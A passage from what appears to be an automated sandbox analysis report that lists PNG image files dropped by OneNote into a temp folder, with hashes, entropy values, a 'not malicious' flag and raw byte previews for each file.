Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Temp\{A9CCE46D-7007-4716-933F-6273BA8C2434}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Temp\{AAAF8635-3EC2-4455-B0CB-87DADA0F0E84}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Temp\{AB105881-DADF-4E0F-91DA-CE56F9CD411A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Temp\{AC57D711-0264-487F-9448-DAA97844A7EE}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Temp\{AE0AD945-2071-43E1-A922-7AB861845E05}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{AE97BECA-87EE-473D-902A-8EB8FDB87D8D}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Temp\{B1B74F7D-571D-46E9-B43C-A8D8E36E9564}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Temp\{B1E3AE1E-9707-4E8D-8AE9-0D9DDF620800}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Temp\{B32853FD-C27C-4348-926E-6F2AF22A1905}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Temp\{B3A488BD-9783-430A-856A-E687CC0F1894}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Temp\{B42F7425-57EC-4B95-A8D3-19E0984C2926}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{B7A995DC-97E2-4F27-B005-D2B2C96128FA}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Temp\{B7E823F0-DF98-4234-BC84-4ACBA08FFDF6}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Temp\{B95C72F1-DDA9-4B01-962E-388014DB3E6F}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
